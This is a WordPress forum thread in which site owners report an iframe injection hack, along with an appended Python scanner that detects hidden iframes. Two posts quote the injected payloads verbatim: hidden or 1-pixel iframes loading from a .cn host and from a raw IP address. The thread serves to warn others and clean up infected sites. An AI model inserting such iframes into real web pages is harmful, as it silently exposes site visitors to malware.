• Hello –

    This week one of the sites I work on was hacked and an iframe was placed in all index.php files, plus in the functions.php file in the wp-includes folder.

    The specific hack code is:
    <iframe src="https://filmproductionlifemedia.cn:8080/ts/in.cgi?pepsi70" width=125 height=125 style="visibility: hidden"></iframe>

    This code often overwrites the ending php tags in the file and thus brings the site down.

    I have seen a couple of other threads on this (links at bottom), but not exactly the same code example, so wanted to bring it to light here to:

    • Gauge how often it’s happening
    • Share solutions
    • Expose the culprits, if possible
    • Alert WP team so they can review possible core level security measures

    As to remedies and security measures to take, the other threads have given some good advice, and I plan to sweep my machine and those of other team members with FTP access (could be a virus attached to our systems), check recent plugins, scan for viruses on the hosting servers, and change all relevant security codes and settings. I will report again here, and encourage you to do the same.

    Here are the other useful threads I have found:

    – Scott

Viewing 8 replies - 31 through 38 (of 38 total)
  • @xinfo

    In my case this was a web hosting problem. There was not much I could do about the server having a hacker doing whatever he wants on it.

    I fully understand that in many cases the user is the one to blame. However, it is not the only option, and it is reckless to assume that WordPress and hosting are at all times absolutely secure.

    I had the same hack on WP 2.7 (my fault for not updating to the newest version). In the server log was the ftp record for this day. Seems to be an automated script that downloads only files with “index” in the filename. The iframe is copied inside and the file will be uploaded back to the server. The whole operation was done through proxy servers, so it’s difficult to track.

    It was easy to check all the files, because they had the same timestamp with the date and time of the modification.

    However, where is the hole to get ftp access…?

    Thomas_Kr,

    That's the perfect signature for malware.

    They got it (the hole) from you. You have malware on a machine you've been using, or you're using insecure wireless connections or internet cafe connections, or or or …..

    I’ve had the same. An iFrame appearing on the top and bottom of blog pages, dropping viruses and trying to interfere with the local machine. SpyDr spotted something it didn’t like in Acrobat 8. No sooner had this appeared than there was a hoax Windows-style security alert which led to a Total Security installation and a trojan dropping onto the PC. It all leaves a nasty taste in the mouth!

    I could see the iFrame in the source but not where it was coming from. I did find that index.php contained an instance of this iFrame (I had 2 infected sites sharing the same MySQL DB) but deleting that (and instantly changing the FTP on this thread’s advice) didn’t seem to do it, I can only think that there must have been more than one file injecting this code into the pages.

    I’m now running a reinstall of all admin and include files and this seems to be doing the trick. I’ll be interested to hear how to stop this happening in future.

    I have this problem too and it is related to the server!

    I partly solved the problem: I chmod all index files to 400, read-only. This first happened 4 months ago and I chmod the files to 400. No problem for 4 months, and today it happened again with 3 files. I have now again chmod all index files to 400 and will see what happens.

    Regards, Mladen
    https://www.besplatnifilmovi.biz

    I have several WordPress blogs now showing the dreaded malware warning. 2 of these sites also have an index.html and normal html pages. iframe code is showing up on all pages. I upload from a Mac, and have no idea how to scan for viruses. I thought Macs don’t have them? I feel like dumping WordPress, as I am not technical enough to track this down. I would rather clean out the problem, but where to begin? Do I really have to open every file in WordPress and look for I don’t know what? If I can get the sites cleaned, I’ll follow the instructions for Hardening WordPress. There aren’t enough hours in the day to understand this stuff.

    akram123khan25

    (@akram123khan25)

    Same problem for me.
    I have two blogs:
    https://www.jinahe.com
    https://info.jinahe.com

    Just wondering if people are still having this problem. We got hit over the weekend.
    <?php echo ''; ?><?php echo ''; ?><?php echo '<iframe src="https://91.201.28.6/goods/index.php" width="1" height="1" frameborder="0"></iframe>'; ?>
    I would not have noticed if it wasn’t loading the pages to the bottom.
    Any updates on why this is happening or how to defend against it?
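
    An added example, not part of any post in this thread: a Python scan for the cleanup several posters describe, flagging hidden iframes (invisible style or 0/1 px size, as in the two snippets quoted above) in .php/.html files and grouping flagged files that share one modification timestamp. The function names, the sample tree and the `example.invalid` host are constructed for illustration.

```python
import os, re, tempfile
from collections import defaultdict
from pathlib import Path

# Heuristics from the two snippets quoted in the thread: an <iframe> that is
# styled invisible or sized 0/1 px. Visible embeds (width=560) are ignored.
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
HIDDEN = re.compile(
    r"visibility\s*:\s*hidden|display\s*:\s*none"
    r"|\b(?:width|height)\s*=\s*[\"']?[01][\"']?(?![\w%])", re.I)
SUFFIXES = {".php", ".html", ".htm"}

def scan(root):
    """Return (relative path, mtime, tag) for each hidden iframe under root."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="replace")
            for tag in IFRAME.findall(text):
                if HIDDEN.search(tag):
                    rel = path.relative_to(root).as_posix()
                    hits.append((rel, int(path.stat().st_mtime), tag))
    return hits

def shared_mtimes(hits):
    """Group flagged files by mtime; a batch injection leaves one timestamp."""
    groups = defaultdict(set)
    for rel, mtime, _ in hits:
        groups[mtime].add(rel)
    return {m: sorted(f) for m, f in groups.items() if len(f) > 1}

def demo():
    """Build a constructed sample tree (placeholder host) and scan it."""
    bad1 = '<?php get_header();\n<iframe src="https://example.invalid/x" width=125 height=125 style="visibility: hidden"></iframe>'
    bad2 = "<?php echo '<iframe src=\"https://example.invalid/y\" width=\"1\" height=\"1\" frameborder=\"0\"></iframe>'; ?>"
    good = '<iframe src="https://example.invalid/video" width="560" height="315"></iframe>'
    files = {"index.php": (bad1, 1_000_000), "about.html": (good, 2_000_000),
             "wp-includes/functions.php": (bad2, 1_000_000)}
    with tempfile.TemporaryDirectory() as root:
        for rel, (body, mtime) in files.items():
            p = Path(root, rel)
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body, encoding="utf-8")
            os.utime(p, (mtime, mtime))
        hits = scan(root)
        return hits, shared_mtimes(hits)

if __name__ == "__main__":
    print(demo())
```

    To check a real site, call `scan()` on a downloaded copy of the web root; a clean result here only means no hidden iframe tag was found, not that the files are otherwise unmodified.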

  • The topic ‘iFrame Hack on Several WP Sites’ is closed to new replies.